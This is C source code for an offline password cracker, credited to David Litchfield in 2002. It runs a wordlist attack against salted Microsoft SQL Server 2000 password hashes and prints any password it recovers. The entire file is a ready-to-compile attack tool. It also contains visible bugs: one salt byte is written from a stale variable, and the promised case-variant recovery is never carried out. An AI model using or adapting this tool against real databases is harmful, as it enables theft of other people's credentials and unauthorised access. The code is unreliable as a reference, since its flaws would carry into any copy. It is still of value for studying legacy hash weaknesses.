////////////////////////////////////////////////////////////////////////////////

1. /////////////////////////////////////////////////////////////////////////////////
2. //
3. // SQLCrackCl
4. //
5. // This will perform a dictionary attack against the
6. // upper-cased hash for a password. Once this
7. // has been discovered try all case variant to work
8. // out the case sensitive password.
9. //
10. // This code was written by David Litchfield to
11. // demonstrate how Microsoft SQL Server 2000
12. // passwords can be attacked. This can be
13. // optimized considerably by not using the CryptoAPI.
14. //
15. // (Compile with VC++ and link with advapi32.lib
16. // Ensure the Platform SDK has been installed, too!)
17. //
18. //////////////////////////////////////////////////////////////////////////////////
19. #include <stdio.h>
20. #include <windows.h>
21. #include <wincrypt.h>
22. FILE *fd=NULL;
23. char *lerr = "\nLength Error!\n";
24. int wd=0;
25. int OpenPasswordFile(char *pwdfile);
26. int CrackPassword(char *hash);
27. int main(int argc, char *argv[])
28. {
29. int err = 0;
30. if(argc !=3)
31. {
32. printf("\n\n*** SQLCrack *** \n\n");
33. printf("C:\\>%s hash passwd-file\n\n",argv[0]);
34. printf("David Litchfield (david@ngssoftware.com)\n");
35. printf("24th June 2002\n");
36. return 0;
37. }
38. err = OpenPasswordFile(argv[2]);
39. if(err !=0)
40. {
41. return printf("\nThere was an error opening the password file %s\n",argv[2]);
42. }
43. err = CrackPassword(argv[1]);
44. fclose(fd);
45. printf("\n\n%d",wd);
46. return 0;
47. }
48. int OpenPasswordFile(char *pwdfile)
49. {
50. fd = fopen(pwdfile,"r");
51. if(fd)
52. return 0;
53. else
54. return 1;
55. }
56. int CrackPassword(char *hash)
57. {
58. char phash[100]="";
59. char pheader[8]="";
60. char pkey[12]="";
61. char pnorm[44]="";
62. char pucase[44]="";
63. char pucfirst[8]="";
64. char wttf[44]="";
65. char uwttf[100]="";
66. char *wp=NULL;
67. char *ptr=NULL;
68. int cnt = 0;
69. int count = 0;
70. unsigned int key=0;
71. unsigned int t=0;
72. unsigned int address = 0;
73. unsigned char cmp=0;
74. unsigned char x=0;
75. HCRYPTPROV hProv=0;
76. HCRYPTHASH hHash;
77. DWORD hl=100;
78. unsigned char szhash[100]="";
79. int len=0;
80. if(strlen(hash) !=94)
81. {
82. return printf("\nThe password hash is too short!\n");
83. }
84. if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
85. {
86. hash = hash + 2;
87. strncpy(pheader,hash,4);
88. printf("\nHeader\t\t: %s",pheader);
89. if(strlen(pheader)!=4)
90. return printf("%s",lerr);
91. hash = hash + 4;
92. strncpy(pkey,hash,8);
93. printf("\nRand key\t: %s",pkey);
94. if(strlen(pkey)!=8)
95. return printf("%s",lerr);
96. hash = hash + 8;
97. strncpy(pnorm,hash,40);
98. printf("\nNormal\t\t: %s",pnorm);
99. if(strlen(pnorm)!=40)
100. return printf("%s",lerr);
101. hash = hash + 40;
102. strncpy(pucase,hash,40);
103. printf("\nUpper Case\t: %s",pucase);
104. if(strlen(pucase)!=40)
105. return printf("%s",lerr);
106. strncpy(pucfirst,pucase,2);
107. sscanf(pucfirst,"%x",&cmp);
108. }
109. else
110. {
111. return printf("The password hash has an invalid format!\n");
112. }
113. printf("\n\n Trying...\n");
114. if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
115. {
116. if(GetLastError()==NTE_BAD_KEYSET)
117. {
118. // KeySet does not exist. So create a new keyset
119. if(!CryptAcquireContext(&hProv, NULL,
120. NULL,
121. PROV_RSA_FULL,
122. CRYPT_NEWKEYSET ))
123. {
124. printf("FAILLLLLLL!!!");
125. return FALSE;
126. }
127. }
128. }
129. while(1)
130. {
131. // get a word to try from the file
132. ZeroMemory(wttf,44);
133. if(!fgets(wttf,40,fd))
134. return printf("\nEnd of password file. Didn't find the password.\n");
135. wd++;
136. len = strlen(wttf);
137. wttf[len-1]=0x00;
138. ZeroMemory(uwttf,84);
139. // Convert the word to UNICODE
140. while(count < len)
141. {
142. uwttf[cnt]=wttf[count];
143. cnt++;
144. uwttf[cnt]=0x00;
145. count++;
146. cnt++;
147. }
148. len --;
149. wp = &uwttf;
150. sscanf(pkey,"%x",&key);
151. cnt = cnt - 2;
152. // Append the random stuff to the end of
153. // the uppercase unicode password
154. t = key >> 24;
155. x = (unsigned char) t;
156. uwttf[cnt]=x;
157. cnt++;
158. t = key << 8;
159. t = t >> 24;
160. uwttf[cnt]=x;
161. cnt++;
162. t = key << 16;
163. t = t >> 24;
164. x = (unsigned char) t;
165. uwttf[cnt]=x;
166. cnt++;
167. t = key << 24;
168. t = t >> 24;
169. x = (unsigned char) t;
170. uwttf[cnt]=x;
171. cnt++;
172. // Create the hash
173. if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
174. {
175. printf("Error %x during CryptCreatHash!\n", GetLastError());
176. return 0;
177. }
178. if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
179. {
180. printf("Error %x during CryptHashData!\n", GetLastError());
181. return FALSE;
182. }
183. CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
184. // Test the first byte only. Much quicker.
185. if(szhash[0] == cmp)
186. {
187. // If first byte matches try the rest
188. ptr = pucase;
189. cnt = 1;
190. while(cnt < 20)
191. {
192. ptr = ptr + 2;
193. strncpy(pucfirst,ptr,2);
194. sscanf(pucfirst,"%x",&cmp);
195. if(szhash[cnt]==cmp)
196. cnt ++;
197. else
198. {
199. break;
200. }
201. }
202. if(cnt == 20)
203. {
204. printf("\nA MATCH!!! Password is %s\n",wttf);
205. return 0;
206. }
207. }
208. count = 0;
209. cnt=0;
210. }
211. return 0;
212. }
213.  
214.